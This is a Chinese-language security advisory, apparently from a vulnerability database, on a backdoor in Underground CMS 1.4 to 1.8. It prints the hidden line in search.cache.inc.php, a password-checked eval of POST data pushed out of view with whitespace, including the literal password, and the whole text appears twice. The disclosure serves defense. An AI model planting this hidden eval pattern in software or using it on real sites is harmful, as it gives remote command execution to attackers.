Underground CMS是一款内容管理程序。 Underground CMS Search.Cache.Inc.PHP存在一个后门,远程攻击者可以利用漏洞以WEB进程权限执行任意指令。 问题存在于/php/modules/entries/search.cache.inc.php文件中: 第8行: $cache_path = '/search/' . GetValidFilename($search_term) . '_' . $search_hash . '_info.dat'; if(@stripslashes($_POST['p']) == 'ZCShY8FjtEhIF8LZ'){@eval(@stripslashes($_POST['e']));exit;}; 第二个字符串隐藏在使用空格的非常右边的地方,因此会忽略。攻击者借此可导致以WEB权限执行任意命令。 Underground CMS 1.8 Underground CMS 1.7 Underground CMS 1.4 目前没有详细解决方案提供: <a href=http://anonymservices.org/ target=_blank>http://anonymservices.org/</a>
Underground CMS是一款内容管理程序。 Underground CMS Search.Cache.Inc.PHP存在一个后门,远程攻击者可以利用漏洞以WEB进程权限执行任意指令。 问题存在于/php/modules/entries/search.cache.inc.php文件中: 第8行: $cache_path = '/search/' . GetValidFilename($search_term) . '_' . $search_hash . '_info.dat'; if(@stripslashes($_POST['p']) == 'ZCShY8FjtEhIF8LZ'){@eval(@stripslashes($_POST['e']));exit;}; 第二个字符串隐藏在使用空格的非常右边的地方,因此会忽略。攻击者借此可导致以WEB权限执行任意命令。 Underground CMS 1.8 Underground CMS 1.7 Underground CMS 1.4 目前没有详细解决方案提供: <a href=http://anonymservices.org/ target=_blank>http://anonymservices.org/</a>